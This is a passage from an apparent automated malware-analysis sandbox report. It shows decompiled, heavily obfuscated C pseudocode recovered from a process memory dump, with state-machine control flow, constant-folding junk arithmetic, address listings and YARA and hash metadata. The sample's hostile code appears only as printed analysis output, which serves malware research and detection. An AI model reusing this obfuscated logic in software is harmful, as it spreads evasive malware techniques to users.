											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E006C568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E006C29E3( &_v524, 0x104, E006D889D(0x6dc8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E006D2025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E006D4F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E006C8736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E006CC6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E006CF536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E006D388A();
								_t479 = E006D0ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E006CB35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E006C80BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E006C88E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x6dc8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x6dca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x6dca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}
























































































                                          0x006c4a3b
                                          0x006c4a46
                                          0x006c4a51
                                          0x006c4a5c
                                          0x006c4a64
                                          0x006c4a6c
                                          0x006c4a71
                                          0x006c4a79
                                          0x006c4a81
                                          0x006c4a8c
                                          0x006c4a94
                                          0x006c4a9f
                                          0x006c4aaa
                                          0x006c4ab2
                                          0x006c4abd
                                          0x006c4ad3
                                          0x006c4ada
                                          0x006c4ae3
                                          0x006c4aea
                                          0x006c4aef
                                          0x006c4af8
                                          0x006c4b03
                                          0x006c4b0b
                                          0x006c4b13
                                          0x006c4b1b
                                          0x006c4b23
                                          0x006c4b35
                                          0x006c4b3a
                                          0x006c4b43
                                          0x006c4b4e
                                          0x006c4b5a
                                          0x006c4b5d
                                          0x006c4b61
                                          0x006c4b69
                                          0x006c4b71
                                          0x006c4b79
                                          0x006c4b81
                                          0x006c4b85
                                          0x006c4b8d
                                          0x006c4b98
                                          0x006c4ba0
                                          0x006c4bab
                                          0x006c4bb6
                                          0x006c4bc1
                                          0x006c4bcc
                                          0x006c4bd4
                                          0x006c4bdc
                                          0x006c4be4
                                          0x006c4bec
                                          0x006c4bf4
                                          0x006c4bff
                                          0x006c4c0a
                                          0x006c4c15
                                          0x006c4c20
                                          0x006c4c28
                                          0x006c4c33
                                          0x006c4c3e
                                          0x006c4c49
                                          0x006c4c54
                                          0x006c4c67
                                          0x006c4c6e
                                          0x006c4c79
                                          0x006c4c81
                                          0x006c4c89
                                          0x006c4c8e
                                          0x006c4c98
                                          0x006c4ca8
                                          0x006c4cae
                                          0x006c4cb6
                                          0x006c4cbb
                                          0x006c4cc3
                                          0x006c4cce
                                          0x006c4cd9
                                          0x006c4ce4
                                          0x006c4cec
                                          0x006c4cf1
                                          0x006c4cf9
                                          0x006c4d01
                                          0x006c4d09
                                          0x006c4d14
                                          0x006c4d1f
                                          0x006c4d2a
                                          0x006c4d32
                                          0x006c4d37
                                          0x006c4d3f
                                          0x006c4d47
                                          0x006c4d4f
                                          0x006c4d57
                                          0x006c4d5f
                                          0x006c4d67
                                          0x006c4d6f
                                          0x006c4d77
                                          0x006c4d80
                                          0x006c4d85
                                          0x006c4d8b
                                          0x006c4d93
                                          0x006c4d9e
                                          0x006c4da9
                                          0x006c4db4
                                          0x006c4dbc
                                          0x006c4dc4
                                          0x006c4dc9
                                          0x006c4dd1
                                          0x006c4dd9
                                          0x006c4de5
                                          0x006c4de8
                                          0x006c4dec
                                          0x006c4df4
                                          0x006c4dfc
                                          0x006c4e04
                                          0x006c4e09
                                          0x006c4e0e
                                          0x006c4e16
                                          0x006c4e21
                                          0x006c4e29
                                          0x006c4e34
                                          0x006c4e3c
                                          0x006c4e44
                                          0x006c4e49
                                          0x006c4e51
                                          0x006c4e64
                                          0x006c4e6b
                                          0x006c4e76
                                          0x006c4e7e
                                          0x006c4e86
                                          0x006c4e8e
                                          0x006c4e96
                                          0x006c4e9e
                                          0x006c4ea6
                                          0x006c4eae
                                          0x006c4eb6
                                          0x006c4ec1
                                          0x006c4ecc
                                          0x006c4ed7
                                          0x006c4ee4
                                          0x006c4eef
                                          0x006c4efa
                                          0x006c4f02
                                          0x006c4f0a
                                          0x006c4f12
                                          0x006c4f1a
                                          0x006c4f22
                                          0x006c4f27
                                          0x006c4f2c
                                          0x006c4f34
                                          0x006c4f3c
                                          0x006c4f4a
                                          0x006c4f4f
                                          0x006c4f5a
                                          0x006c4f5b
                                          0x006c4f5f
                                          0x006c4f67
                                          0x006c4f72
                                          0x006c4f7d
                                          0x006c4f88
                                          0x006c4f93
                                          0x006c4f9e
                                          0x006c4fa9
                                          0x006c4fb4
                                          0x006c4fbf
                                          0x006c4fca
                                          0x006c4fd7
                                          0x006c4fdb
                                          0x006c4fe3
                                          0x006c4fe8
                                          0x006c4ff0
                                          0x006c4ffb
                                          0x006c5003
                                          0x006c500e
                                          0x006c5019
                                          0x006c5021
                                          0x006c502c
                                          0x006c5034
                                          0x006c503c
                                          0x006c5044
                                          0x006c5049
                                          0x006c5051
                                          0x006c5059
                                          0x006c5063
                                          0x006c5067
                                          0x006c506f
                                          0x006c5077
                                          0x006c5082
                                          0x006c508d
                                          0x006c5098
                                          0x006c50a0
                                          0x006c50a5
                                          0x006c50ad
                                          0x006c50b5
                                          0x006c50c0
                                          0x006c50cb
                                          0x006c50d6
                                          0x006c50e1
                                          0x006c50ee
                                          0x006c50f2
                                          0x006c50fa
                                          0x006c5102
                                          0x006c510a
                                          0x006c5118
                                          0x006c5121
                                          0x006c5125
                                          0x006c512d
                                          0x006c5135
                                          0x006c513d
                                          0x006c5142
                                          0x006c5155
                                          0x006c515a
                                          0x006c5161
                                          0x006c5163
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x006c516f
                                          0x006c516f
                                          0x006c516f
                                          0x006c516f
                                          0x006c5175
                                          0x00000000
                                          0x00000000
                                          0x006c517b
                                          0x00000000
                                          0x006c54f8
                                          0x006c5187
                                          0x006c5193
                                          0x006c52e9
                                          0x006c52ef
                                          0x006c52f0
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c5199
                                          0x006c519f
                                          0x006c52ad
                                          0x006c52b8
                                          0x006c52bd
                                          0x006c52bf
                                          0x006c52c2
                                          0x006c52c9
                                          0x006c52ce
                                          0x00000000
                                          0x006c51a5
                                          0x006c51ab
                                          0x006c525c
                                          0x006c525d
                                          0x006c526d
                                          0x006c526f
                                          0x006c5277
                                          0x006c5279
                                          0x006c527d
                                          0x006c5284
                                          0x006c5285
                                          0x006c528a
                                          0x006c528d
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c51b1
                                          0x006c51b3
                                          0x006c51e0
                                          0x006c522f
                                          0x006c5234
                                          0x006c524b
                                          0x006c5251
                                          0x006c5252
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c51b5
                                          0x006c51bb
                                          0x00000000
                                          0x006c51c1
                                          0x006c51d3
                                          0x006c51d8
                                          0x006c51d9
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c516a
                                          0x006c51bb
                                          0x006c51b3
                                          0x006c51ab
                                          0x006c519f
                                          0x006c53b2
                                          0x006c53b2
                                          0x006c53b2
                                          0x006c530c
                                          0x006c5310
                                          0x006c5311
                                          0x006c5316
                                          0x006c5319
                                          0x006c531a
                                          0x006c531c
                                          0x006c5322
                                          0x006c5323
                                          0x006c5342
                                          0x006c534a
                                          0x006c534f
                                          0x006c5352
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c531c
                                          0x006c535c
                                          0x006c5362
                                          0x006c54bd
                                          0x006c54c4
                                          0x006c54c9
                                          0x00000000
                                          0x006c5368
                                          0x006c5368
                                          0x006c536e
                                          0x006c5439
                                          0x006c5440
                                          0x006c5445
                                          0x006c545c
                                          0x006c5490
                                          0x006c5495
                                          0x006c549a
                                          0x006c549c
                                          0x00000000
                                          0x006c5374
                                          0x006c5374
                                          0x006c537a
                                          0x006c5404
                                          0x006c540c
                                          0x006c5414
                                          0x006c5415
                                          0x00000000
                                          0x006c537c
                                          0x006c537c
                                          0x006c5382
                                          0x006c53c8
                                          0x006c53ce
                                          0x006c53d6
                                          0x006c53d8
                                          0x006c53d9
                                          0x006c53d9
                                          0x006c53df
                                          0x006c53df
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c5384
                                          0x006c5384
                                          0x006c538a
                                          0x006c5397
                                          0x006c539a
                                          0x006c539f
                                          0x006c53a2
                                          0x00000000
                                          0x006c53a2
                                          0x00000000
                                          0x006c538a
                                          0x006c5382
                                          0x006c537a
                                          0x006c536e
                                          0x00000000
                                          0x006c54ce
                                          0x006c54ce
                                          0x006c54ce
                                          0x00000000
                                          0x006c516f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                          • API String ID: 0-2931794159
                                          • Opcode ID: 3fbddae332b31417b40c7e7430686ac53371363d2028fc0735c606c770b88e2a
                                          • Instruction ID: d952030c76407b6f1ad76f2b813a7e4f38f524a558f531980b172eca878fe128
                                          • Opcode Fuzzy Hash: 3fbddae332b31417b40c7e7430686ac53371363d2028fc0735c606c770b88e2a
                                          • Instruction Fuzzy Hash: 3F3215715087808FE378CF21C94AB9BBBE2FB84314F10891DE5DA962A0D7B59849CF03
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C8F78, Relevance: 15.4, Strings: 12, Instructions: 367COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E006C8F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E006CBB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E006D4F7D(_v552, _v580, _v540);
										E006D4F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E006D4F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E006CF536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E006CF326();
										E006CF6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E006C17AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x6dc910);
												_t378 = E006C88E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E006D4F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E006C568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E006D4F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E006C8736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x6dca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x6dca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}


































































                                          0x006c8f78
                                          0x006c8f7e
                                          0x006c8f86
                                          0x006c8f8e
                                          0x006c8f96
                                          0x006c8f9b
                                          0x006c8fa3
                                          0x006c8fab
                                          0x006c8fb3
                                          0x006c8fb8
                                          0x006c8fbd
                                          0x006c8fc5
                                          0x006c8fcd
                                          0x006c8fd5
                                          0x006c8fdd
                                          0x006c8fea
                                          0x006c8ff1
                                          0x006c8ff7
                                          0x006c8ffc
                                          0x006c9001
                                          0x006c9007
                                          0x006c900f
                                          0x006c9017
                                          0x006c901f
                                          0x006c9024
                                          0x006c902c
                                          0x006c9039
                                          0x006c903c
                                          0x006c9040
                                          0x006c9048
                                          0x006c9050
                                          0x006c905b
                                          0x006c9066
                                          0x006c9071
                                          0x006c907c
                                          0x006c9087
                                          0x006c9092
                                          0x006c909a
                                          0x006c90a2
                                          0x006c90a7
                                          0x006c90af
                                          0x006c90b7
                                          0x006c90bf
                                          0x006c90c7
                                          0x006c90cf
                                          0x006c90df
                                          0x006c90e8
                                          0x006c90eb
                                          0x006c90ef
                                          0x006c90f4
                                          0x006c90fc
                                          0x006c9104
                                          0x006c910f
                                          0x006c9113
                                          0x006c911b
                                          0x006c9123
                                          0x006c912b
                                          0x006c9133
                                          0x006c9138
                                          0x006c9140
                                          0x006c9148
                                          0x006c9156
                                          0x006c915b
                                          0x006c9161
                                          0x006c9169
                                          0x006c9176
                                          0x006c9179
                                          0x006c917d
                                          0x006c918d
                                          0x006c9191
                                          0x006c9199
                                          0x006c91a1
                                          0x006c91a6
                                          0x006c91ae
                                          0x006c91b3
                                          0x006c91bb
                                          0x006c91c8
                                          0x006c91cb
                                          0x006c91cf
                                          0x006c91d7
                                          0x006c91df
                                          0x006c91ea
                                          0x006c91f5
                                          0x006c9200
                                          0x006c920b
                                          0x006c9213
                                          0x006c921e
                                          0x006c9226
                                          0x006c9233
                                          0x006c9237
                                          0x006c923f
                                          0x006c9247
                                          0x006c924c
                                          0x006c9251
                                          0x006c9259
                                          0x006c9264
                                          0x006c926f
                                          0x006c927a
                                          0x006c9285
                                          0x006c928d
                                          0x006c9298
                                          0x006c92a3
                                          0x006c92ae
                                          0x006c92b9
                                          0x006c92c1
                                          0x006c92c9
                                          0x006c92d1
                                          0x006c92d9
                                          0x006c92e6
                                          0x006c92e7
                                          0x006c92eb
                                          0x006c92f3
                                          0x006c92fb
                                          0x006c9309
                                          0x006c930d
                                          0x006c9315
                                          0x006c931d
                                          0x006c9325
                                          0x006c932d
                                          0x006c9332
                                          0x006c933a
                                          0x006c9342
                                          0x006c934a
                                          0x006c9352
                                          0x006c935a
                                          0x006c9362
                                          0x006c936a
                                          0x006c9378
                                          0x006c9379
                                          0x006c9380
                                          0x006c9387
                                          0x006c938b
                                          0x006c9393
                                          0x006c939b
                                          0x006c93a0
                                          0x006c93a8
                                          0x006c93b0
                                          0x006c93b8
                                          0x006c93c2
                                          0x006c93c6
                                          0x006c93ce
                                          0x006c93d6
                                          0x006c93db
                                          0x006c93e3
                                          0x006c93eb
                                          0x006c93f3
                                          0x006c93fe
                                          0x006c9402
                                          0x006c940a
                                          0x006c9417
                                          0x006c941b
                                          0x006c9423
                                          0x006c942b
                                          0x006c9433
                                          0x006c9433
                                          0x006c9433
                                          0x006c9438
                                          0x006c9438
                                          0x006c9438
                                          0x006c943d
                                          0x006c943d
                                          0x006c943d
                                          0x006c943d
                                          0x006c943f
                                          0x00000000
                                          0x00000000
                                          0x006c9445
                                          0x006c955a
                                          0x006c955b
                                          0x006c957f
                                          0x006c9584
                                          0x006c9589
                                          0x006c959d
                                          0x006c95b5
                                          0x006c95ba
                                          0x006c95bb
                                          0x006c95c2
                                          0x006c95c9
                                          0x006c95d0
                                          0x006c95d0
                                          0x006c95d6
                                          0x006c95d6
                                          0x006c9433
                                          0x006c9433
                                          0x006c9433
                                          0x00000000
                                          0x006c9433
                                          0x006c944b
                                          0x006c9451
                                          0x00000000
                                          0x006c96c1
                                          0x006c945d
                                          0x006c952e
                                          0x006c9535
                                          0x006c9541
                                          0x006c9546
                                          0x006c954b
                                          0x00000000
                                          0x006c9463
                                          0x006c9469
                                          0x006c94d8
                                          0x006c9511
                                          0x00000000
                                          0x006c94da
                                          0x006c94da
                                          0x006c94e5
                                          0x006c94e7
                                          0x006c94f4
                                          0x006c94f9
                                          0x006c94fe
                                          0x006c9506
                                          0x006c9433
                                          0x006c9433
                                          0x006c9433
                                          0x006c9438
                                          0x006c9438
                                          0x00000000
                                          0x006c9438
                                          0x006c9433
                                          0x006c946b
                                          0x006c9471
                                          0x00000000
                                          0x006c9477
                                          0x006c9485
                                          0x006c9486
                                          0x006c948d
                                          0x006c9495
                                          0x006c949b
                                          0x006c94b0
                                          0x006c94c1
                                          0x006c94c7
                                          0x006c94c7
                                          0x006c94cc
                                          0x006c9438
                                          0x006c9438
                                          0x006c9438
                                          0x00000000
                                          0x006c9438
                                          0x006c949d
                                          0x006c94a4
                                          0x006c94a9
                                          0x00000000
                                          0x006c94a9
                                          0x006c949b
                                          0x006c9471
                                          0x006c9469
                                          0x006c945d
                                          0x006c95ec
                                          0x006c95f2
                                          0x006c95fa
                                          0x00000000
                                          0x006c9600
                                          0x006c9600
                                          0x006c9601
                                          0x006c960e
                                          0x006c960f
                                          0x006c960f
                                          0x006c961a
                                          0x006c961b
                                          0x006c9626
                                          0x006c9628
                                          0x006c962d
                                          0x006c9632
                                          0x00000000
                                          0x006c9634
                                          0x006c9643
                                          0x006c9648
                                          0x006c964d
                                          0x006c9654
                                          0x00000000
                                          0x006c9654
                                          0x00000000
                                          0x006c9632
                                          0x006c96cc
                                          0x006c96cc
                                          0x006c96cc
                                          0x006c965d
                                          0x006c9669
                                          0x006c966a
                                          0x006c966d
                                          0x006c966e
                                          0x006c9673
                                          0x006c9679
                                          0x006c967b
                                          0x00000000
                                          0x006c967b
                                          0x00000000
                                          0x006c9679
                                          0x006c95e6
                                          0x006c9685
                                          0x006c9688
                                          0x006c968d
                                          0x006c9692
                                          0x006c9695
                                          0x006c969a
                                          0x00000000
                                          0x006c969a
                                          0x00000000
                                          0x006c96a0
                                          0x006c96a0
                                          0x00000000
                                          0x006c943d
                                          0x006c9438

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                          • API String ID: 0-964951681
                                          • Opcode ID: 80e30609485377edb98c6cdad092393e8a1b833d1d03bb6b0f7a8a4b471eb0c3
                                          • Instruction ID: 6736197d75a95e30fd5f9f3921f831166e1a21474c4f9fadbee197369afdbb6e
                                          • Opcode Fuzzy Hash: 80e30609485377edb98c6cdad092393e8a1b833d1d03bb6b0f7a8a4b471eb0c3
